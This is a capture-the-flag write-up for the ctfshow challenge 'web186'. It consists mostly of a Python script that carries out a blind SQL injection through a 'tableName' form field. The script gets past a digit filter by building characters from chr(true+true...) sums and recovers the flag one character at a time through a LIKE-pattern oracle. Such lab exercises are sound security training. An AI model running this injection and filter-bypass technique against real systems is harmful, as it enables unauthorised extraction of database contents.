web186

复用上一题的脚本就行

import requests, re

# Endpoint of the CTF challenge instance that every probe request is sent to.
url = "http://241b3994-3e6b-4390-886d-7f042ef22362.challenge.ctf.show/select-waf.php"
# Template for the tableName form field; {} receives the chr(...) argument
# list that concat() joins into the LIKE pattern.
post_tem = "ctfshow_user group by pass HAVING pass like(concat({}))"
# Candidate alphabet tried at each position: '-', the ten digits, then a-z.
dic = "-1234567890abcdefghijklmnopqrstuvwxyz"
# Characters confirmed so far, one list element per character.
res = list()

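def str_to_hex(s):
    """Return the hexadecimal code of every character in *s*, concatenated.

    Each character contributes at least two lowercase hex digits, so code
    points below 0x10 (a newline, for example) keep their leading zero and
    ASCII input always yields an even-length, byte-aligned string. Code
    points above 0xFF are written as the hex of the code point itself, not
    as UTF-8 bytes.

    Not called anywhere in the visible script.
    """
    # '02x' zero-pads; hex(ord(c)) with '0x' stripped gives a single digit
    # for control characters, which shifts every later byte boundary.
    return ''.join(format(ord(c), '02x') for c in s)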

def createNum(n):
    """Spell the integer *n* as a sum of ``true`` literals, without any digit.

    createNum(3) gives ``'true+true+true'``. The expression has the intended
    value only where the SQL dialect treats ``true`` as 1.

    Any *n* below 1 also returns the single term ``'true'``, so 0 and negative
    numbers cannot be represented.
    """
    if n == 1:
        return 'true'
    # One leading term plus (n - 1) "+true" suffixes; a non-positive repeat
    # count yields an empty suffix, leaving just 'true'.
    return 'true' + '+true' * (n - 1)

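def createStrNum(s):
    """Build the comma-separated ``chr(...)`` argument list that spells *s*.

    Every character of *s* becomes one ``chr(<expr>)`` term, where ``<expr>``
    is the digit-free sum produced by createNum() for that character's code
    point. The terms are joined with commas so the result can be dropped
    straight into a ``concat(...)`` call.

    An empty *s* returns an empty string instead of raising IndexError.
    """
    # A generator plus join replaces the manual accumulator, which was named
    # `str` and shadowed the builtin inside this function.
    return ",".join("chr(" + createNum(ord(ch)) + ")" for ch in s)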

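# Recover the value one character at a time. Each request asks whether some
# `pass` value matches LIKE 'ctfshow{<known prefix><candidate>%}'; the reply
# containing "$user_count = 1" is treated as "yes".
#
# NOTE(review): this only works as a yes/no oracle if the server places the
# tableName value into its SQL text unchanged - presumably the case here, the
# server code is not shown. Restricting tableName to an allow-list of known
# identifiers on the server side removes the oracle.
for _ in range(1, 50):  # hard upper bound of 49 recovered characters
    temp = len(res)
    for i in dic:
        res.append(i)  # tentatively extend the known prefix by one candidate
        post = {"tableName": post_tem.format(createStrNum("ctfshow{"+"".join(res)+"%}"))}
        print(post)
        # timeout so a stalled connection fails instead of blocking forever
        r = requests.post(url=url, data=post, timeout=10)
        # Raw string: "\$" in a normal literal is an invalid escape sequence
        # and triggers a warning on current Python versions.
        # NOTE(review): the pattern would also match "$user_count = 10" and
        # similar - confirm against the actual response format.
        if re.search(r"\$user_count = 1", r.text):
            break
        res.pop(-1)  # candidate rejected, restore the prefix

    # No candidate extended the prefix in this round: the value is complete
    # (or contains a character outside `dic`).
    if temp == len(res):
        break

print("ctfshow{" + "".join(res) + "}")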